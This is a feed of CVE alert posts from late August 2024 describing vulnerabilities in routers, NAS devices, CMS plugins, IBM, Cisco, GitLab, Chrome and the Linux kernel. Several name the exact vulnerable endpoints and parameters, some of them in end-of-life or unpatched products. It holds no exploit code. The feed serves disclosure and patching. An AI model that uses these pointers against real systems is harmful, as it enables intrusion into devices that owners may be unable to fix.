🚨 CVE-2024-43955Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Themeum Droip allows File Manipulation.This issue affects Droip: from n/a through 1.1.1.🎖@cveNotify |
|
| 2024-08-29 16:37:26 |
🚨 CVE-2024-43954Incorrect Authorization vulnerability in Themeum Droip allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Droip: from n/a through 1.1.1.🎖@cveNotify |
|
| 2024-08-29 16:37:25 |
🚨 CVE-2024-35118IBM MaaS360 for Android 6.31 through 8.60 is using hard coded credentials that can be obtained by a user with physical access to the device.🎖@cveNotify |
|
| 2024-08-29 16:37:24 |
🚨 CVE-2024-42467openHAB, a provider of open-source home automation software, has add-ons including the visualization add-on CometVisu. Prior to version 4.2.1, the proxy endpoint of openHAB's CometVisu add-on can be accessed without authentication. This proxy-feature can be exploited as Server-Side Request Forgery (SSRF) to induce GET HTTP requests to internal-only servers, in case openHAB is exposed in a non-private network. Furthermore, this proxy-feature can also be exploited as a Cross-Site Scripting (XSS) vulnerability, as an attacker is able to re-route a request to their server and return a page with malicious JavaScript code. Since the browser receives this data directly from the openHAB CometVisu UI, this JavaScript code will be executed with the origin of the CometVisu UI. This allows an attacker to exploit call endpoints on an openHAB server even if the openHAB server is located in a private network. (e.g. by sending an openHAB admin a link that proxies malicious JavaScript.) This issue may lead up to Remote Code Execution (RCE) when chained with other vulnerabilities. Users should upgrade to version 4.2.1 of the CometVisu add-on of openHAB to receive a patch.🎖@cveNotify |
|
| 2024-08-29 16:07:40 |
🚨 CVE-2024-8218A vulnerability was found in code-projects Online Quiz Site 1.0 and classified as critical. This issue affects some unknown processing of the file index.php. The manipulation of the argument loginid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-29 16:07:37 |
🚨 CVE-2024-8217A vulnerability has been found in SourceCodester E-Commerce Website 1.0 and classified as critical. This vulnerability affects unknown code of the file /Admin/registration.php. The manipulation of the argument fname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-29 16:07:36 |
🚨 CVE-2024-8213A vulnerability classified as critical has been found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. Affected is the function cgi_FMT_R12R5_1st_DiskMGR of the file /cgi-bin/hd_config.cgi. The manipulation of the argument f_source_dev leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-29 16:07:35 |
🚨 CVE-2024-8212A vulnerability was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. It has been rated as critical. This issue affects the function cgi_FMT_R12R5_2nd_DiskMGR of the file /cgi-bin/hd_config.cgi. The manipulation of the argument f_source_dev leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-29 16:07:31 |
🚨 CVE-2024-43140Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in G5Theme Ultimate Bootstrap Elements for Elementor allows PHP Local File Inclusion.This issue affects Ultimate Bootstrap Elements for Elementor: from n/a through 1.4.4.🎖@cveNotify |
|
| 2024-08-29 16:07:30 |
🚨 CVE-2024-7554An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.9 before 17.0.6, all versions starting from 17.1 before 17.1.4, all versions starting from 17.2 before 17.2.2. Under certain conditions, access tokens may have been logged when an API request was made in a specific manner.🎖@cveNotify |
|
| 2024-08-29 16:07:26 |
🚨 CVE-2024-4207A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 5.1 prior 17.0.6, starting from 17.1 prior to 17.1.4, and starting from 17.2 prior to 17.2.2. When viewing an XML file in a repository in raw mode, it can be made to render as HTML if viewed under specific circumstances.🎖@cveNotify |
|
| 2024-08-29 16:07:25 |
🚨 CVE-2024-37462Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in G5Theme Ultimate Bootstrap Elements for Elementor allows Path Traversal.This issue affects Ultimate Bootstrap Elements for Elementor: from n/a through 1.4.2.🎖@cveNotify |
|
| 2024-08-29 15:37:26 |
🚨 CVE-2023-4513BT SDP dissector memory leak in Wireshark 4.0.0 to 4.0.7 and 3.6.0 to 3.6.15 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2024-08-29 15:37:25 |
🚨 CVE-2023-4511BT SDP dissector infinite loop in Wireshark 4.0.0 to 4.0.7 and 3.6.0 to 3.6.15 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2024-08-29 14:37:32 |
🚨 CVE-2024-8302A vulnerability was found in dingfanzu CMS up to 29d67d9044f6f93378e6eb6ff92272217ff7225c. It has been rated as critical. Affected by this issue is some unknown functionality of the file /ajax/chpwd.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-29 14:37:31 |
🚨 CVE-2024-38693Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs WP User Frontend allows SQL Injection.This issue affects WP User Frontend: from n/a through 4.0.7.🎖@cveNotify |
|
| 2024-08-29 14:37:30 |
🚨 CVE-2024-1056The FunnelKit Funnel Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'allow_iframe_tag_in_post' function which uses the 'wp_kses_allowed_html' filter to globally allow script and iframe tags in posts in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-29 14:37:26 |
🚨 CVE-2023-38018IBM Aspera Shares 1.10.0 PL2 does not invalidate session after a password change which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 260574.🎖@cveNotify |
|
| 2024-08-29 14:37:25 |
🚨 CVE-2024-39287Dorsett Controls Central Server update server has potential information leaks with an unprotected file that contains passwords and API keys.🎖@cveNotify |
|
| 2024-08-29 14:37:24 |
🚨 CVE-2024-37382An issue discovered in import host feature in Ab Initio Metadata Hub and Authorization Gateway before 4.3.1.1 allows attackers to run arbitrary code via crafted modification of server configuration.🎖@cveNotify |
|
| 2024-08-29 14:07:25 |
🚨 CVE-2024-40909In the Linux kernel, the following vulnerability has been resolved:bpf: Fix a potential use-after-free in bpf_link_free()After commit 1a80dbcb2dba, bpf_link can be freed bylink->ops->dealloc_deferred, but the code still tests and useslink->ops->dealloc afterward, which leads to a use-after-free asreported by syzbot. Actually, one of them should be sufficient, sojust call one of them instead of both. Also add a WARN_ON() in caseof any problematic implementation.🎖@cveNotify |
|
| 2024-08-29 13:37:38 |
🚨 CVE-2024-20289A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, low-privileged, local attacker to execute arbitrary commands on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of arguments for a specific CLI command. An attacker could exploit this vulnerability by including crafted input as the argument of the affected command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the currently logged-in user.🎖@cveNotify |
|
| 2024-08-29 13:37:31 |
🚨 CVE-2024-20284A vulnerability in the Python interpreter of Cisco NX-OS Software could allow an authenticated, low-privileged, local attacker to escape the Python sandbox and gain unauthorized access to the underlying operating system of the device.The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by manipulating specific functions within the Python interpreter. A successful exploit could allow an attacker to escape the Python sandbox and execute arbitrary commands on the underlying operating system with the privileges of the authenticated user. Note: An attacker must be authenticated with Python execution privileges to exploit these vulnerabilities. For more information regarding Python execution privileges, see product-specific documentation, such as the section of the Cisco Nexus 9000 Series NX-OS Programmability Guide.🎖@cveNotify |
|
| 2024-08-29 13:37:30 |
🚨 CVE-2024-42900Ruoyi v4.7.9 and before was discovered to contain a cross-site scripting (XSS) vulnerability via the sql parameter of the createTable() function at /tool/gen/create.🎖@cveNotify |
|
| 2024-08-29 13:37:26 |
🚨 CVE-2024-42531Ezviz Internet PT Camera CS-CV246 D15655150 allows an unauthenticated host to access its live video stream by crafting a set of RTSP packets with a specific set of URLs that can be used to redirect the camera feed. NOTE: the vendor's perspective is that the Anonymous120386 sample code can establish RTSP protocol communictaion, but cannot obtain video or audio data; thus, there is no risk.🎖@cveNotify |
|
| 2024-08-29 13:37:25 |
🚨 CVE-2024-22425Dell RecoverPoint for Virtual Machines 5.3.x, 6.0.SP1 contains a brute force/dictionary attack vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to launch a brute force attack or a dictionary attack against the RecoverPoint login form. This allows attackers to brute-force the password of valid users in an automated manner.🎖@cveNotify |
|
| 2024-08-29 13:07:25 |
🚨 CVE-2024-41890Missing Release of Resource after Effective Lifetime vulnerability in Apache Answer.This issue affects Apache Answer: through 1.3.5.User sends multiple password reset emails, each containing a valid link. Within the link's validity period, this could potentially lead to the link being misused or hijacked.Users are recommended to upgrade to version 1.3.6, which fixes the issue.🎖@cveNotify |
|
| 2024-08-29 13:07:24 |
🚨 CVE-2024-41888Missing Release of Resource after Effective Lifetime vulnerability in Apache Answer.This issue affects Apache Answer: through 1.3.5.The password reset link remains valid within its expiration period even after it has been used. This could potentially lead to the link being misused or hijacked.Users are recommended to upgrade to version 1.3.6, which fixes the issue.🎖@cveNotify |
|
| 2024-08-29 12:37:24 |
🚨 CVE-2024-8295A vulnerability has been found in FeehiCMS up to 2.1.1 and classified as critical. This vulnerability affects the function createBanner of the file /admin/index.php?r=banner%2Fbanner-create. The manipulation of the argument BannerForm[img] leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-29 11:37:33 |
🚨 CVE-2024-29725SQL injection vulnerabilities in SportsNET affecting version 4.0.1. These vulnerabilities could allow an attacker to retrieve, update and delete all information in the database by sending a specially crafted SQL query: https://XXXXXXX.saludydesafio.com/app/ax/sort_bloques/, parameter list.🎖@cveNotify |
|
| 2024-08-29 11:37:26 |
🚨 CVE-2024-29723SQL injection vulnerabilities in SportsNET affecting version 4.0.1. These vulnerabilities could allow an attacker to retrieve, update and delete all information in the database by sending a specially crafted SQL query: https://XXXXXXX.saludydesafio.com/conexiones/ax/openTracExt/, parameter categoria;.🎖@cveNotify |
|
| 2024-08-29 11:37:25 |
🚨 CVE-2016-1000338In Bouncy Castle JCE Provider version 1.55 and earlier the DSA does not fully validate ASN.1 encoding of signature on verification. It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure.🎖@cveNotify |
|
| 2024-08-29 03:37:26 |
🚨 CVE-2024-7857The Media Library Folders plugin for WordPress is vulnerable to second order SQL Injection via the 'sort_type' parameter of the 'mlf_change_sort_type' AJAX action in all versions up to, and including, 8.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-08-29 03:37:25 |
🚨 CVE-2024-41918'Rakuten Ichiba App' for Android 12.4.0 and earlier and 'Rakuten Ichiba App' for iOS 11.7.0 and earlier are vulnerable to improper authorization in handler for custom URL scheme. An arbitrary site may be displayed on the WebView of the product via Intent from another application installed on the user's device. As a result, the user may be redirected to an unauthorized site, and the user may become a victim of a phishing attack.🎖@cveNotify |
|
| 2024-08-29 03:37:24 |
🚨 CVE-2024-45346A code execution vulnerability exists in the XiaomiGetApps application product. This vulnerability is caused by the verification logic being bypassed, and an attacker can exploit this vulnerability to execute malicious code.🎖@cveNotify |
|
| 2024-08-29 03:07:30 |
🚨 CVE-2024-7455A vulnerability, which was classified as critical, was found in itsourcecode Tailoring Management System 1.0. This affects an unknown part of the file partedit.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273549 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-29 03:07:29 |
🚨 CVE-2024-7454A vulnerability, which was classified as critical, has been found in SourceCodester Clinics Patient Management System 1.0. Affected by this issue is the function patient_name of the file patients.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273548.🎖@cveNotify |
|
| 2024-08-29 02:37:30 |
🚨 CVE-2022-48892In the Linux kernel, the following vulnerability has been resolved:sched/core: Fix use-after-free bug in dup_user_cpus_ptr()Since commit 07ec77a1d4e8 ("sched: Allow task CPU affinity to berestricted on asymmetric systems"), the setting and clearing ofuser_cpus_ptr are done under pi_lock for arm64 architecture. However,dup_user_cpus_ptr() accesses user_cpus_ptr without any lockprotection. Since sched_setaffinity() can be invoked from anotherprocess, the process being modified may be undergoing fork() atthe same time. When racing with the clearing of user_cpus_ptr in__set_cpus_allowed_ptr_locked(), it can lead to user-after-free andpossibly double-free in arm64 kernel.Commit 8f9ea86fdf99 ("sched: Always preserve the user requestedcpumask") fixes this problem as user_cpus_ptr, once set, will neverbe cleared in a task's lifetime. However, this bug was re-introducedin commit 851a723e45d1 ("sched: Always clear user_cpus_ptr indo_set_cpus_allowed()") which allows the clearing of user_cpus_ptr indo_set_cpus_allowed(). This time, it will affect all arches.Fix this bug by always clearing the user_cpus_ptr of the newlycloned/forked task before the copying process starts and check theuser_cpus_ptr state of the source task under pi_lock.Note to stable, this patch won't be applicable to stable releases.Just copy the new dup_user_cpus_ptr() function over.🎖@cveNotify |
|
| 2024-08-29 02:37:29 |
🚨 CVE-2022-48888In the Linux kernel, the following vulnerability has been resolved:drm/msm/dpu: Fix memory leak in msm_mdss_parse_data_bus_icc_pathof_icc_get() alloc resources for path1, we should release it when notneed anymore. Early return when IS_ERR_OR_NULL(path0) may leak path1.Defer getting path1 to fix this.Patchwork: https://patchwork.freedesktop.org/patch/514264/🎖@cveNotify |
|
| 2024-08-29 02:37:26 |
🚨 CVE-2022-48882In the Linux kernel, the following vulnerability has been resolved:net/mlx5e: Fix macsec possible null dereference when updating MAC security entity (SecY)Upon updating MAC security entity (SecY) in hw offload path, the macsecsecurity association (SA) initialization routine is called. In case ofextended packet number (epn) is enabled the salt and ssci attributes areretrieved using the MACsec driver rx_sa context which is unavailable whenupdating a SecY property such as encoding-sa hence the null dereference.Fix by using the provided SA to set those attributes.🎖@cveNotify |
|
| 2024-08-29 02:37:25 |
🚨 CVE-2024-38538In the Linux kernel, the following vulnerability has been resolved:net: bridge: xmit: make sure we have at least eth header len bytessyzbot triggered an uninit value[1] error in bridge device's xmit pathby sending a short (less than ETH_HLEN bytes) skb. To fix it check ifwe can actually pull that amount instead of assuming.Tested with dropwatch: drop at: br_dev_xmit+0xb93/0x12d0 [bridge] (0xffffffffc06739b3) origin: software timestamp: Mon May 13 11:31:53 2024 778214037 nsec protocol: 0x88a8 length: 2 original length: 2 drop reason: PKT_TOO_SMALL[1]BUG: KMSAN: uninit-value in br_dev_xmit+0x61d/0x1cb0 net/bridge/br_device.c:65 br_dev_xmit+0x61d/0x1cb0 net/bridge/br_device.c:65 __netdev_start_xmit include/linux/netdevice.h:4903 [inline] netdev_start_xmit include/linux/netdevice.h:4917 [inline] xmit_one net/core/dev.c:3531 [inline] dev_hard_start_xmit+0x247/0xa20 net/core/dev.c:3547 __dev_queue_xmit+0x34db/0x5350 net/core/dev.c:4341 dev_queue_xmit include/linux/netdevice.h:3091 [inline] __bpf_tx_skb net/core/filter.c:2136 [inline] __bpf_redirect_common net/core/filter.c:2180 [inline] __bpf_redirect+0x14a6/0x1620 net/core/filter.c:2187 ____bpf_clone_redirect net/core/filter.c:2460 [inline] bpf_clone_redirect+0x328/0x470 net/core/filter.c:2432 ___bpf_prog_run+0x13fe/0xe0f0 kernel/bpf/core.c:1997 __bpf_prog_run512+0xb5/0xe0 kernel/bpf/core.c:2238 bpf_dispatcher_nop_func include/linux/bpf.h:1234 [inline] __bpf_prog_run include/linux/filter.h:657 [inline] bpf_prog_run include/linux/filter.h:664 [inline] bpf_test_run+0x499/0xc30 net/bpf/test_run.c:425 bpf_prog_test_run_skb+0x14ea/0x1f20 net/bpf/test_run.c:1058 bpf_prog_test_run+0x6b7/0xad0 kernel/bpf/syscall.c:4269 __sys_bpf+0x6aa/0xd90 kernel/bpf/syscall.c:5678 __do_sys_bpf kernel/bpf/syscall.c:5767 [inline] __se_sys_bpf kernel/bpf/syscall.c:5765 [inline] __x64_sys_bpf+0xa0/0xe0 kernel/bpf/syscall.c:5765 x64_sys_call+0x96b/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:322 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f🎖@cveNotify |
|
| 2024-08-29 02:37:24 |
🚨 CVE-2024-36976In the Linux kernel, the following vulnerability has been resolved:Revert "media: v4l2-ctrls: show all owned controls in log_status"This reverts commit 9801b5b28c6929139d6fceeee8d739cc67bb2739.This patch introduced a potential deadlock scenario:[Wed May 8 10:02:06 2024] Possible unsafe locking scenario:[Wed May 8 10:02:06 2024] CPU0 CPU1[Wed May 8 10:02:06 2024] ---- ----[Wed May 8 10:02:06 2024] lock(vivid_ctrls:1620:(hdl_vid_cap)->_lock);[Wed May 8 10:02:06 2024] lock(vivid_ctrls:1608:(hdl_user_vid)->_lock);[Wed May 8 10:02:06 2024] lock(vivid_ctrls:1620:(hdl_vid_cap)->_lock);[Wed May 8 10:02:06 2024] lock(vivid_ctrls:1608:(hdl_user_vid)->_lock);For now just revert.🎖@cveNotify |
|
| 2024-08-29 01:07:24 |
🚨 CVE-2024-7965Inappropriate implementation in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-29 00:37:35 |
🚨 CVE-2024-8229A vulnerability was found in Tenda O6 1.0.0.7(2054). It has been declared as critical. This vulnerability affects the function frommacFilterModify of the file /goform/operateMacFilter. The manipulation of the argument mac leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-29 00:37:29 |
🚨 CVE-2024-8228A vulnerability was found in Tenda O5 1.0.0.8(5017). It has been classified as critical. This affects the function fromSafeSetMacFilter of the file /goform/setMacFilterList. The manipulation of the argument remark/type/time leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-29 00:37:28 |
🚨 CVE-2024-8225A vulnerability, which was classified as critical, was found in Tenda G3 15.11.0.20. Affected is the function formSetSysTime of the file /goform/SetSysTimeCfg. The manipulation of the argument sysTimePolicy leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-29 00:37:27 |
🚨 CVE-2024-8224A vulnerability, which was classified as critical, has been found in Tenda G3 15.11.0.20. This issue affects the function formSetDebugCfg of the file /goform/setDebugCfg. The manipulation of the argument enable/level/module leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-29 00:07:39 |
🚨 CVE-2024-42439Untrusted search path in the installer for Zoom Workplace Desktop App for macOS and Zoom Meeting SDK for macOS before 6.1.0 may allow a privileged user to conduct an escalation of privilege via local access.🎖@cveNotify |
|
| 2024-08-29 00:07:38 |
🚨 CVE-2024-42438Buffer overflow in some Zoom Workplace Apps, SDKs, Rooms Clients, and Rooms Controllers may allow an authenticated user to conduct a denial of service via network access.🎖@cveNotify |
|
| 2024-08-28 23:37:25 |
🚨 CVE-2024-8194Type Confusion in V8 in Google Chrome prior to 128.0.6613.113 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-28 23:37:24 |
🚨 CVE-2024-7969Type Confusion in V8 in Google Chrome prior to 128.0.6613.113 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-28 22:37:24 |
🚨 CVE-2024-31905IBM QRadar Network Packet Capture 7.5 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 289858.🎖@cveNotify |
|
| 2024-08-28 22:07:25 |
🚨 CVE-2024-7867In Xpdf 4.05 (and earlier), very large coordinates in a page box can cause an integer overflow and divide-by-zero.🎖@cveNotify |
|
| 2024-08-28 22:07:24 |
🚨 CVE-2024-25024IBM QRadar Suite Software 1.10.12.0 through 1.10.23.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 281430.🎖@cveNotify |
|
| 2024-08-28 21:37:25 |
🚨 CVE-2024-26445flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_place.php🎖@cveNotify |
|
| 2024-08-28 21:37:24 |
🚨 CVE-2024-25893ChurchCRM 5.5.0 FRCertificates.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter.🎖@cveNotify |
|
| 2024-08-28 21:07:25 |
🚨 CVE-2024-42462Improper Authentication vulnerability in upKeeper Solutions product upKeeper Manager allows Authentication Bypass.This issue affects upKeeper Manager: through 5.1.9.🎖@cveNotify |
|
| 2024-08-28 21:07:24 |
🚨 CVE-2024-7853A vulnerability was found in SourceCodester Yoga Class Registration System up to 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/?page=categories/view_category. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-28 20:37:43 |
🚨 CVE-2024-42793A Cross-Site Request Forgery (CSRF) vulnerability was found in Kashipara Music Management System v1.0 via a crafted request to the /music/ajax.php?action=save_user page.🎖@cveNotify |
|
| 2024-08-28 20:37:42 |
🚨 CVE-2024-44761An issue in EQ Enterprise Management System before v2.0.0 allows attackers to execute a directory traversal via crafted requests.🎖@cveNotify |
|
| 2024-08-28 20:37:41 |
🚨 CVE-2024-42851Buffer Overflow vulnerability in open source exiftags v.1.01 allows a local attacker to execute arbitrary code via the paresetag function.🎖@cveNotify |
|
| 2024-08-28 20:37:38 |
🚨 CVE-2024-42913RuoYi CMS v4.7.9 was discovered to contain a SQL injection vulnerability via the job_id parameter at /sasfs1.🎖@cveNotify |
|
| 2024-08-28 20:37:37 |
🚨 CVE-2024-42464Authorization Bypass Through User-Controlled Key vulnerability in upKeeper Solutions product upKeeper Manager allows Utilizing REST's Trust in the System Resource to Obtain Sensitive Data.This issue affects upKeeper Manager: through 5.1.9.🎖@cveNotify |
|
| 2024-08-28 20:37:36 |
🚨 CVE-2024-35344Certain Anpviz products contain a hardcoded cryptographic key stored in the firmware of the device. This affects IPC-D250, IPC-D260, IPC-B850, IPC-D850, IPC-D350, IPC-D3150, IPC-D4250, IPC-D380, IPC-D880, IPC-D280, IPC-D3180, MC800N, YM500L, YM800N_N2, YMF50B, YM800SV2, YM500L8, and YM200E10 firmware v3.2.2.2 and lower and possibly more vendors/models of IP camera.🎖@cveNotify |
|
| 2024-08-28 20:37:32 |
🚨 CVE-2024-29435An issue discovered in Alldata v0.4.6 allows attacker to run arbitrary commands via the processId parameter.🎖@cveNotify |
|
| 2024-08-28 20:37:31 |
🚨 CVE-2023-51835An issue in TRENDnet TEW-822DRE v.1.03B02 allows a local attacker to execute arbitrary code via the parameters ipv4_ping in the /boafrm/formSystemCheck.🎖@cveNotify |
|
| 2024-08-28 20:37:30 |
🚨 CVE-2024-26491A cross-site scripting (XSS) vulnerability in the Addon JD Flusity 'Media Gallery with description' module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Gallery name text field.🎖@cveNotify |
|
| 2024-08-28 20:37:26 |
🚨 CVE-2023-42873The issue was addressed with improved bounds checks. This issue is fixed in macOS Sonoma 14.1, tvOS 17.1, macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1, macOS Ventura 13.6.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-08-28 20:07:33 |
🚨 CVE-2024-40934In the Linux kernel, the following vulnerability has been resolved:HID: logitech-dj: Fix memory leak in logi_dj_recv_switch_to_dj_mode()Fix a memory leak on logi_dj_recv_send_report() error path.🎖@cveNotify |
|
| 2024-08-28 20:07:26 |
🚨 CVE-2024-40899In the Linux kernel, the following vulnerability has been resolved:cachefiles: fix slab-use-after-free in cachefiles_ondemand_get_fd()We got the following issue in a fuzz test of randomly issuing the restorecommand:==================================================================BUG: KASAN: slab-use-after-free in cachefiles_ondemand_daemon_read+0x609/0xab0Write of size 4 at addr ffff888109164a80 by task ondemand-04-dae/4962CPU: 11 PID: 4962 Comm: ondemand-04-dae Not tainted 6.8.0-rc7-dirty #542Call Trace: kasan_report+0x94/0xc0 cachefiles_ondemand_daemon_read+0x609/0xab0 vfs_read+0x169/0xb50 ksys_read+0xf5/0x1e0Allocated by task 626: __kmalloc+0x1df/0x4b0 cachefiles_ondemand_send_req+0x24d/0x690 cachefiles_create_tmpfile+0x249/0xb30 cachefiles_create_file+0x6f/0x140 cachefiles_look_up_object+0x29c/0xa60 cachefiles_lookup_cookie+0x37d/0xca0 fscache_cookie_state_machine+0x43c/0x1230 [...]Freed by task 626: kfree+0xf1/0x2c0 cachefiles_ondemand_send_req+0x568/0x690 cachefiles_create_tmpfile+0x249/0xb30 cachefiles_create_file+0x6f/0x140 cachefiles_look_up_object+0x29c/0xa60 cachefiles_lookup_cookie+0x37d/0xca0 fscache_cookie_state_machine+0x43c/0x1230 [...]==================================================================Following is the process that triggers the issue: mount | daemon_thread1 | daemon_thread2------------------------------------------------------------ cachefiles_ondemand_init_object cachefiles_ondemand_send_req REQ_A = kzalloc(sizeof(*req) + data_len) wait_for_completion(&REQ_A->done) cachefiles_daemon_read cachefiles_ondemand_daemon_read REQ_A = cachefiles_ondemand_select_req cachefiles_ondemand_get_fd copy_to_user(_buffer, msg, n) process_open_req(REQ_A) ------ restore ------ cachefiles_ondemand_restore xas_for_each(&xas, req, ULONG_MAX) xas_set_mark(&xas, CACHEFILES_REQ_NEW); cachefiles_daemon_read cachefiles_ondemand_daemon_read REQ_A = cachefiles_ondemand_select_req write(devfd, ("copen %u,%llu", msg->msg_id, size)); cachefiles_ondemand_copen xa_erase(&cache->reqs, id) complete(&REQ_A->done) kfree(REQ_A) cachefiles_ondemand_get_fd(REQ_A) fd = get_unused_fd_flags file = anon_inode_getfile fd_install(fd, file) load = (void *)REQ_A->msg.data; load->fd = fd; // load UAF !!!This issue is caused by issuing a restore command when the daemon is stillalive, which results in a request being processed multiple times thustriggering a UAF. So to avoid this problem, add an additional referencecount to cachefiles_req, which is held while waiting and reading, and thenreleased when the waiting and reading is over.Note that since there is only one reference count for waiting, we need toavoid the same request being completed multiple times, so we can onlycomplete the request if it is successfully removed from the xarray.🎖@cveNotify |
|
| 2024-08-28 20:07:25 |
🚨 CVE-2024-39506In the Linux kernel, the following vulnerability has been resolved:liquidio: Adjust a NULL pointer handling path in lio_vf_rep_copy_packetIn lio_vf_rep_copy_packet() pg_info->page is compared to a NULL value,but then it is unconditionally passed to skb_add_rx_frag() which looksstrange and could lead to null pointer dereference.lio_vf_rep_copy_packet() call trace looks like: octeon_droq_process_packets octeon_droq_fast_process_packets octeon_droq_dispatch_pkt octeon_create_recv_info ...search in the dispatch_list... ->disp_fn(rdisp->rinfo, ...) lio_vf_rep_pkt_recv(struct octeon_recv_info *recv_info, ...)In this path there is no code which sets pg_info->page to NULL.So this check looks unneeded and doesn't solve potential problem.But I guess the author had reason to add a check and I have no such cardand can't do real test.In addition, the code in the function liquidio_push_packet() inliquidio/lio_core.c does exactly the same.Based on this, I consider the most acceptable compromise solution toadjust this issue by moving skb_add_rx_frag() into conditional scope.Found by Linux Verification Center (linuxtesting.org) with SVACE.🎖@cveNotify |
|
| 2024-08-28 20:07:24 |
🚨 CVE-2024-39504In the Linux kernel, the following vulnerability has been resolved:netfilter: nft_inner: validate mandatory meta and payloadCheck for mandatory netlink attributes in payload and meta expressionwhen used embedded from the inner expression, otherwise NULL pointerdereference is possible from userspace.🎖@cveNotify |
|
| 2024-08-28 19:37:38 |
🚨 CVE-2024-28338A login bypass in TOTOLINK A8000RU V7.1cu.643_B20200521 allows attackers to login to Administrator accounts via providing a crafted session cookie.🎖@cveNotify |
|
| 2024-08-28 19:37:32 |
